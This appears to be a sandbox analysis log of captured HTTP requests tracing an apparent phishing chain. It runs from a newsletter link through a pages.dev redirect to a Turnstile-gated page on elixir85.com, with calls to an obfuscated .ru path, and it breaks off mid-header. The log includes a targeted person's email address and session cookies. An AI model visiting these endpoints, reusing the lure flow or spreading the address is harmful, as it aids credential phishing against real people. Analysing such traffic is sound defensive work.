Source: global traffic HTTP traffic detected: GET /?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /RfWAi/ HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik85WmNPeGFtNzFCRmZENHVOYmliOEE9PSIsInZhbHVlIjoiaFdXZDIrMXFxbGxvSHN0UzdvN3hGdHRETGl1MFR3R2h5MFVjMHhiSktjV01GeWsrTHgrT3lwMmpWY00vcGQzaW4yLy8rQ1dDNmQ2VW80WXpZT3VhWVlTUTA2SlExYTdpMVBhT1hkRVdVYVFlMG4rMlh3SUJXVlZJa2kyVVUrTk0iLCJtYWMiOiJhMmRjNTNjM2UyMmI3NjcyMmY0YTE5MjZlOThjMmEyZWViMWQ0MGUzOGU0ZDMwNzk0MDQwNDIwMzVkNzcxODU4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkxpcnF4Um5kMjBRai9UcjRVNHg5Z1E9PSIsInZhbHVlIjoiMVREMG4ydDhhbUhKZzVZbmxXK0pHdnFmKzZVWlF4Q1NuMFRudmlJeWVrYmQvMmpxOFB0Rm1lSFJ2RlZuOTVraHNnZzZQbC85c2xRYVZHNUp1UlNOVDRIQy83S3RaMmM0cFVrYlhadlVFbTdQV0ZIRzdJSHZWbjVQS1BMSnlwb1IiLCJtYWMiOiI0NjE0ZjhjZDdmZDMyYjUxNGYwYjczZWQyZDBmMWNmNTFlMDA0ZTUyNWZmN2Q0M2IwY2Q4MDUyODc1MzM1MDZkIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1Host: zichd.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1Host: zichd.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d927bb0859422d HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d927bb0859422d/1720033614005/d8f6daa4d2e6b1fbc12647ee8c15bf2aca804b2a7df87a62cbd6f1b874522087/z2eJs3LKj-UAXpj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /RfWAi/ HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rw HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /RfWAi/?vXalysa.a@centurybizsolutions.com HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhSUzFHOUw0NmtSOEg2Snlpb1VnMlE9PSIsInZhbHVlIjoiamxmaDRydjdNRDc1Zm41b2ptUUh4QVlFZDh5U2x4NjJydE1oL1gzM1Via3BldHJqcGFiZ3BFOTdFTTM2ZmlLZ2JIWUdDV1dBMVY2OExPZ0tJQkg1V1dlL29JczlsR2RjWm9qdndhZlREYUh6SmduZGt4Z2JWVDhtR2s4WmpiaFEiLCJtYWMiOiJjNzg3MTllNTZlZTQ4Mzg4MGJlZGU4NjUyZTMwMjAzNmM0YjRjMWI1MGMwYjk4OWRlNjYyZWZmM2Q2ZjA3NzY4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlSTlU5ZUtaV0JPMDFhanNKNVlnWUE9PSIsInZhbHVlIjoiVTdOMmVLdlVsMzJYM1JKMEtKaWlXTHFZNVdsTm96c1ZiMk92M25QRS9nS045bmRTeTZEOHFBaE5sZTRDbEhVVUp3OTVqL3F1eHVpZHVuc1pzeVVPZStSc1d5L2J4blYzWmxELytaR0hYMWN4WmJhaGZKZE5pV0xBT1lNWjBXSWgiLCJtYWMiOiJjMDJhMTQzMmE1OTE3M2UzYzc2ZjJhNGJiMDQ2MzEwOGQzMDlhMDJmYjc1OTczYTI2Yzk3ODM4MDZlMjdjYzFjIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ilp2YjY4OFZKWDUvWlYrdGRJaUtYMXc9PSIsInZhbHVlIjoiYjVlUVBrRmdzekNRcGFJTlFzWlc1VXRsay94b2xHRlZmWnRaa1VOT0U1c1poS0NobEFpZ1o0bGlET2JYaFI3bHVBMlJFbFlTeG54bjRKNHJTQysvQW5wMGVzQS91cGJ5RlMzOU9RSUFSSkRpOGhISW9SWXYxUXE4T3RabDEvM3giLCJtYWMiOiIwZTNhNDM4NzZkNjUzZjU2NWUwNmFiOGY3MTM1YmFlNWMyOTllMDg1NWM0YTVhOGNhNDk5YWU3ODlmNzBkMWVjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFhYVZXak8rUVR6ZjIzUzUvdzNtT3c9PSIsInZhbHVlIjoiV1N2SFFIb1ROd3BQOVZseHNiR3dndGxDUXZpOW1XOVhUNGR0bXlVVDVFZUZGKzR5MllmS2xmaVNYYTJVdS8zZHg3MEpJUUIxU1RxYW1yZm9sUks4MVk0eDE2cUdPNW5QemVnS3loclVOVVlrcXh2ZG9xOUk2U1hYQUs2VHV4bjAiLCJtYWMiOiIzNzNlZmJmOTY1ZjFlYTE1MzRlZWFmNDQ1MzYzOWM3MTQwODU2MTMwNDM3OGE1ZDJmMjgyMTg5MmZkYzc1NjVkIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /12C1tM2Y6lGcdYEVUZu6720 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /abjlZHFJHKoUOtpqyef30 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 